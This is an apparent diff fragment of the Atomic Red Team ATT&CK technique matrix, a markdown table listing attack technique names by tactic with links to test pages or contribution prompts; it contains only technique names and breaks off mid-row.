[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Launchd](../../T1053.004/T1053.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | -| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Share Discovery](../../T1135/T1135.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | [Scheduled Task](../../T1053.005/T1053.005.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | -| | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Data Staging](../../T1074.001/T1074.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | [Service Execution](../../T1569.002/T1569.002.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Local Email Collection](../../T1114.001/T1114.001.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) | -| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | -| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | [Unix Shell](../../T1059.004/T1059.004.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | [Screen Capture](../../T1113/T1113.md) | | [Non-Standard Port](../../T1571/T1571.md) | | -| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Emond](../../T1546.014/T1546.014.md) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Network Sniffing](../../T1040/T1040.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | [Visual Basic](../../T1059.005/T1059.005.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Service Discovery](../../T1007/T1007.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | [System Time Discovery](../../T1124/T1124.md) | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Emond](../../T1546.014/T1546.014.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Remote Access Software](../../T1219/T1219.md) | | -| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | | -| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [External Remote Services](../../T1133/T1133.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | -| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Launch Agent](../../T1543.001/T1543.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launchd](../../T1053.004/T1053.004.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | [Launch Agent](../../T1543.001/T1543.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](../../T1562.003/T1562.003.md) | | | | | | | | -| | | [Launch Daemon](../../T1543.004/T1543.004.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Launchd](../../T1053.004/T1053.004.md) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | | -| | | [Local Account](../../T1136.001/T1136.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | | -| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | | -| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | | -| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | | -| | | [Office Test](../../T1137.002/T1137.002.md) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | | -| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | | -| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | | -| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | | -| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Rc.common](../../T1037.004/T1037.004.md) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | | -| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | -| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | -| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Rc.common](../../T1037.004/T1037.004.md) | [Security Support Provider](../../T1547.005/T1547.005.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | | -| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | | -| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | | -| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Startup Items](../../T1037.005/T1037.005.md) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | | -| | | [Scheduled Task](../../T1053.005/T1053.005.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | | -| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | | -| | | [Screensaver](../../T1546.002/T1546.002.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | | -| | | [Security Support Provider](../../T1547.005/T1547.005.md) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | | -| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | | -| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | | -| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Trap](../../T1546.005/T1546.005.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | | -| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Startup Items](../../T1037.005/T1037.005.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | | -| | | [Systemd Service](../../T1543.002/T1543.002.md) | [Windows Service](../../T1543.003/T1543.003.md) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Transport Agent](../../T1505.002/T1505.002.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Trap](../../T1546.005/T1546.005.md) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Web Shell](../../T1505.003/T1505.003.md) | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | | -| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | [Process Injection](../../T1055/T1055.md) | | | | | | | | -| | | [Windows Service](../../T1543.003/T1543.003.md) | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | [PubPrn](../../T1216.001/T1216.001.md) | | | | | | | | +| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access 